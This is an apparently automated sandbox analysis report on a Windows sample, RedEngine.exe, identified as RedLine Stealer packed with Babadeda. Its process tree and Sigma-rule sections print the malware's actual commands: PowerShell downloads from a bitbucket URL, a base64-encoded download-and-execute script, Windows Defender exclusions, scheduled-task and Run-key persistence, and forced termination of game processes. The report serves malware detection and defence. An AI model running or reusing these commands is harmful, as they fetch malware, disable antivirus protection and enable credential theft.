
Windows Analysis Report
RedEngine.exe

Overview

General Information

Sample name:RedEngine.exe
Analysis ID:1504561
MD5:4fbb04c9e3aa983cbfc4980a7b5b7041
SHA1:34aeca658462e638521bc384a4935251678a9a78
SHA256:24f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731
Tags:exe
Infos:

Detection

Babadeda, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule VBS From Appdata
Suricata IDS alerts for network traffic
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Encrypted powershell cmdline option found
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RedEngine.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\RedEngine.exe" MD5: 4FBB04C9E3AA983CBFC4980A7B5B7041)
    • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mgne4i3n.t1d0.exe (PID: 3024 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe" MD5: 6B1712C45B98661A7BDBC0E458660392)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mgne4i3n.t1d1.exe (PID: 6160 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" MD5: 646A4B7082185499D3682C4FD27F44D0)
        • cmd.exe (PID: 968 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7736 cmdline: chcp 1251 MD5: 33395C4732A49065EA72590B14B64F32)
          • findstr.exe (PID: 7780 cmdline: findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • findstr.exe (PID: 7684 cmdline: findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • findstr.exe (PID: 7696 cmdline: findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • schtasks.exe (PID: 7764 cmdline: schtasks /query /tn "MyBatchScript" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7828 cmdline: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4948 cmdline: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • reg.exe (PID: 8052 cmdline: reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • reg.exe (PID: 368 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • powershell.exe (PID: 1316 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • tasklist.exe (PID: 424 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 6028 cmdline: find /i "tf_win64.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 8060 cmdline: taskkill /f /im tf_win64.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 4580 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 4304 cmdline: find /i "dota2.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 3740 cmdline: taskkill /f /im dota2.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 5192 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 5204 cmdline: find /i "cs2.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 7076 cmdline: taskkill /f /im cs2.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 5344 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 6900 cmdline: find /i "RustClient.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 7356 cmdline: taskkill /f /im RustClient.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 7688 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • find.exe (PID: 4708 cmdline: find /i "GTA5.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • taskkill.exe (PID: 2468 cmdline: taskkill /f /im GTA5.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • tasklist.exe (PID: 4260 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • mgne4i3n.t1d2.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" MD5: BECE6335063D21401AA6A807202A201C)
        • mgne4i3n.t1d2.exe (PID: 2168 cmdline: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" MD5: BECE6335063D21401AA6A807202A201C)
          • cmd.exe (PID: 4240 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8044 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4232 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4184 cmdline: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • OpenWith.exe (PID: 576 cmdline: C:\Windows\system32\OpenWith.exe ""C:\Users\user\AppData\Roaming\runHidden.vbs"" MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 7972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • clppth.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
    • clppth.exe (PID: 5896 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
  • clppth.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
    • clppth.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe" MD5: BECE6335063D21401AA6A807202A201C)
  • cleanup
Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: powershell.exe PID: 7768 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: mgne4i3n.t1d0.exe PID: 3024 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: mgne4i3n.t1d1.exe PID: 6160 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 1316 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
13.0.mgne4i3n.t1d1.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
13.2.mgne4i3n.t1d1.exe.400000.0.unpack | JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7768.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_1316.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe, ProcessId: 2168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CLPPTH
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" , ParentImage: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe, ParentProcessId: 2168, ParentProcessName: mgne4i3n.t1d2.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", ProcessId: 4240, ProcessName: cmd.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAA
